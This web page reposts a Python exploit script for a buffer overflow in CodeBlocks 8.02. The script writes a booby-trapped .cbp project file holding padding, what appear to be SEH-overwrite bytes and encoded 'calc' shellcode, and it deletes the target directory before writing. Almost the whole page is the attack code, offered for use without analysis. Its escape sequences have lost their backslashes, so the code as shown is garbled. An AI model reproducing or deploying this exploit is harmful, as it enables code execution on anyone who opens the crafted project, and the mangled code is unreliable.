Home / os / win7

CodeBlocks 8.02 Buffer Overflow

Posted on 02 February 2011

#!/usr/bin/python



import sys,os,shutil



if len(sys.argv) != 3:

print "------------------------------------------------"
print "CodeBlocks (cbp) Buffer Overflow Exploit "
print "Usage : exploit.py <project_name> <path>"
print "Example : exploit.py sploit_proj c:proj\ "
print "By : sup3r                                 "
print "------------------------------------------------"

sys.exit(0)



name = sys.argv[1]

path = sys.argv[2]



header1=(

"x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20"

"x65x6ex63x6fx64x69x6ex67x3dx22x55x54x46x2dx38x22x20x73x74x61"

"x6ex64x61x6cx6fx6ex65x3dx22x79x65x73x22x20x3fx3ex0ax3cx43x6f"

"x64x65x42x6cx6fx63x6bx73x5fx70x72x6fx6ax65x63x74x5fx66x69x6c"

"x65x3ex0ax09x3cx46x69x6cx65x56x65x72x73x69x6fx6ex20x6dx61x6a"

"x6fx72x3dx22x31x22x20x6dx69x6ex6fx72x3dx22x36x22x20x2fx3ex0a"

"x09x3cx50x72x6fx6ax65x63x74x3ex0ax09x09x3cx4fx70x74x69x6fx6e"

"x20x74x69x74x6cx65x3dx22"+name+"x22x20x2fx3ex0ax09x09x3cx4f"

"x70x74x69x6fx6ex20x70x63x68x5fx6dx6fx64x65x3dx22x32x22x20x2f"

"x3ex0ax09x09x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72"

"x3dx22x67x63x63x22x20x2fx3ex0ax09x09x3cx42x75x69x6cx64x3ex0a"

"x09x09x09x3cx54x61x72x67x65x74x20x74x69x74x6cx65x3dx22x44x65"

"x62x75x67x22x3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x6fx75"

"x74x70x75x74x3dx22")



header2=(

"x22x20x70x72x65x66x69x78x5fx61x75x74x6fx3dx22x31x22x20x65x78"

"x74x65x6ex73x69x6fx6ex5fx61x75x74x6fx3dx22x31x22x20x2fx3ex0a"

"x09x09x09x09x3cx4fx70x74x69x6fx6ex20x6fx62x6ax65x63x74x5fx6f"

"x75x74x70x75x74x3dx22x6fx62x6ax5cx44x65x62x75x67x5cx22x20x2f"

"x3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x74x79x70x65x3dx22"

"x31x22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20x63x6f"

"x6dx70x69x6cx65x72x3dx22x67x63x63x22x20x2fx3ex0ax09x09x09x09"

"x3cx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x09x09x3cx41x64x64"

"x20x6fx70x74x69x6fx6ex3dx22x2dx67x22x20x2fx3ex0ax09x09x09x09"

"x3cx2fx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x3cx2fx54x61x72"

"x67x65x74x3ex0ax09x09x09x3cx54x61x72x67x65x74x20x74x69x74x6c"

"x65x3dx22x52x65x6cx65x61x73x65x22x3ex0ax09x09x09x09x3cx4fx70"

"x74x69x6fx6ex20x6fx75x74x70x75x74x3dx22x62x69x6ex5cx52x65x6c"

"x65x61x73x65x5c"+name+"x22x20x70x72x65x66x69x78x5fx61x75x74"

"x6fx3dx22x31x22x20x65x78x74x65x6ex73x69x6fx6ex5fx61x75x74x6f"

"x3dx22x31x22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74x69x6fx6ex20"

"x6fx62x6ax65x63x74x5fx6fx75x74x70x75x74x3dx22x6fx62x6ax5cx52"

"x65x6cx65x61x73x65x5cx22x20x2fx3ex0ax09x09x09x09x3cx4fx70x74"

"x69x6fx6ex20x74x79x70x65x3dx22x31x22x20x2fx3ex0ax09x09x09x09"

"x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72x3dx22x67x63"

"x63x22x20x2fx3ex0ax09x09x09x09x3cx43x6fx6dx70x69x6cx65x72x3e"

"x0ax09x09x09x09x09x3cx41x64x64x20x6fx70x74x69x6fx6ex3dx22x2d"

"x4fx32x22x20x2fx3ex0ax09x09x09x09x3cx2fx43x6fx6dx70x69x6cx65"

"x72x3ex0ax09x09x09x09x3cx4cx69x6ex6bx65x72x3ex0ax09x09x09x09"

"x09x3cx41x64x64x20x6fx70x74x69x6fx6ex3dx22x2dx73x22x20x2fx3e"

"x0ax09x09x09x09x3cx2fx4cx69x6ex6bx65x72x3ex0ax09x09x09x3cx2f"

"x54x61x72x67x65x74x3ex0ax09x09x3cx2fx42x75x69x6cx64x3ex0ax09"

"x09x3cx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x09x3cx41x64x64x20"

"x6fx70x74x69x6fx6ex3dx22x2dx57x61x6cx6cx22x20x2fx3ex0ax09x09"

"x3cx2fx43x6fx6dx70x69x6cx65x72x3ex0ax09x09x3cx55x6ex69x74x20"

"x66x69x6cx65x6ex61x6dx65x3dx22x6dx61x69x6ex2ex63x22x3ex0ax09"

"x09x09x3cx4fx70x74x69x6fx6ex20x63x6fx6dx70x69x6cx65x72x56x61"

"x72x3dx22x43x43x22x20x2fx3ex0ax09x09x3cx2fx55x6ex69x74x3ex0a"

"x09x09x3cx45x78x74x65x6ex73x69x6fx6ex73x3ex0ax09x09x09x3cx63"

"x6fx64x65x5fx63x6fx6dx70x6cx65x74x69x6fx6ex20x2fx3ex0ax09x09"

"x09x3cx64x65x62x75x67x67x65x72x20x2fx3ex0ax09x09x3cx2fx45x78"

"x74x65x6ex73x69x6fx6ex73x3ex0ax09x3cx2fx50x72x6fx6ax65x63x74"

"x3ex0ax3cx2fx43x6fx64x65x42x6cx6fx63x6bx73x5fx70x72x6fx6ax65"

"x63x74x5fx66x69x6cx65x3ex0a")



c_file=(

"#include <stdio.h>
"

"#include <stdlib.h>

"

"int main()
"

"{
"

"    printf("Don't compile ");
"

"    return 0;
"

"}
")



#calc shellcode -> 375 bytes

shellcode=(

"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta"

"4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM"

"TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP"

"f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM"

"OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO"

"ytJPtq0vzNn7gw1CFtJA")



payload =  header1

payload += "x41"*(4072-len(path))

payload += "x74x06x41x41"

payload += "xp"

payload += "x30x71"

payload += "x61"*169

payload += "x41"*111

payload += shellcode

payload += "x61"*(6720-len(shellcode))

payload += header2



try:

shutil.rmtree(path)

except os.error:

pass



try:

os.mkdir(path)

cbp = open(path+name+'.cbp', 'w')

cbp.write(payload)

cbp.close()

main = open(path+'main.c', 'w')

main.write(c_file)

raw_input("[x] Exploit project created!")



except:

print "Error!"

 

TOP